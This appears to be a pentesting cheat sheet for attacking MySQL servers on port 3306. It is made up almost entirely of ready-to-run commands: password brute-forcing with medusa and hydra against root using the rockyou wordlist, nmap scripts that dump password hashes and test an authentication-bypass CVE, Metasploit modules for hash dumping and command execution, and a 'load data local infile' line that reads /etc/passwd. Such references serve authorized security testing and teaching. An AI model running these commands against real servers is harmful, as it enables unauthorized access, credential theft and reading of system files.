Skip to content

3306 - Pentesting mysql

Connect

Install mysql client

sudo apt install default-mysql-client

Local

mysql -u root # Connect to root without password
mysql -u root -p # A password will be asked (check someone)
mysql --user=root --password=password

Remote

mysql -h $(target) -u root
mysql -h $(target) -u root@localhost
mysql -h $(target) --user=root --password=password

Bruteforce

medusa

medusa -h $(target) -M mysql -u root -P /usr/share/wordlists/rockyou.txt -t 20 -f
hydra
hydra -l root -P /usr/share/wordlists/rockyou.txt $(target) mysql -t 20 -f

Enumerate

Nmap

nmap -p3306 --script=mysql-enum $(target)
nmap -p3306 --script=mysql-audit $(target)
nmap -p3306 --script=mysql-databases $(target)
nmap -p3306 --script=mysql-dump-hashes $(target)
nmap -p3306 --script=mysql-empty-password $(target)
nmap -p3306 --script=mysql-info $(target)
nmap -p3306 --script=mysql-query $(target)
nmap -p3306 --script=mysql-users $(target)
nmap -p3306 --script=mysql-variables $(target)
nmap -p3306 --script=mysql-vuln-cve2012-2122 $(target)

Metasploit

  • msf> use auxiliary/admin/mysql/mysql_sql
  • msf> use auxiliary/scanner/mysql/mysql_version
  • msf> use auxiliary/scanner/mysql/mysql_authbypass_hashdump
  • msf> use auxiliary/scanner/mysql/mysql_hashdump #Creds
  • msf> use auxiliary/admin/mysql/mysql_enum #Creds
  • msf> use auxiliary/scanner/mysql/mysql_schemadump #Creds
  • msf> use exploit/windows/mysql/mysql_start_up #Execute commands Windows, Creds

Mysql Commands

show databases;
use <database-name>;
show tables;
select * from <table-name>

MySQL arbitrary read file by client

mysql> load data local infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n';